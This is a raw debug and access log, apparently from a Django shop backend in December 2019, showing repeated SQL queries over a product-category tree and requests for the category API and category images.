"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:03:33,909 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:03:33,911 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:03:33,914 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:03:33,917 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:03:33,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:03:33,922 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:03:33,925 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:03:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:34] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:37] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:40] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:40] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:42] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:03:42] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:44] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:44] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:45] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:47] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [19/Dec/2019 13:03:47] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:03:47] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 13:03:47] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 13:03:48] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 13:03:51] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:03:51] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:51] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:53] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:53] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:53] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:54] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:03:55] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:03:57] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 13:04:00] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:04:00] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 13:04:01] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:04:02] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [19/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:06:16,583 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:06:16,590 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:06:16,594 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:06:16,596 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:06:16,600 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:06:16,604 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:06:16,606 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:06:16,609 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:06:16,612 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:06:16,616 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:06:16,619 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:06:16,621 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:06:16,624 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:06:16,628 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:06:16,632 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:06:16,635 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:06:16,638 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:06:16,641 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:06:16,644 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:06:16,649 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:06:16,652 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:06:16,655 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:06:16,658 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:06:16,661 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:06:16,665 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:06:16,669 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:06:16,672 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:06:16,675 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:06:16,679 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:06:16,682 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:06:16,686 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:06:16,689 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:06:16,692 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:06:16,695 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:06:16,698 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:06:16,703 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:06:16,705 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:06:16,708 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:06:16,711 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:06:16,714 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:06:16,717 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:06:16,720 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:06:16,723 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:06:16,726 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:06:16,730 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:06:16,733 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:06:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 Not Found: /proxy.php [19/Dec/2019 13:07:47] "GET /proxy.php HTTP/1.0" 404 6454 DEBUG 2019-12-19 13:10:18,983 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:10:18,993 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:10:19,000 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:10:19,004 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:10:19,007 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:10:19,010 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 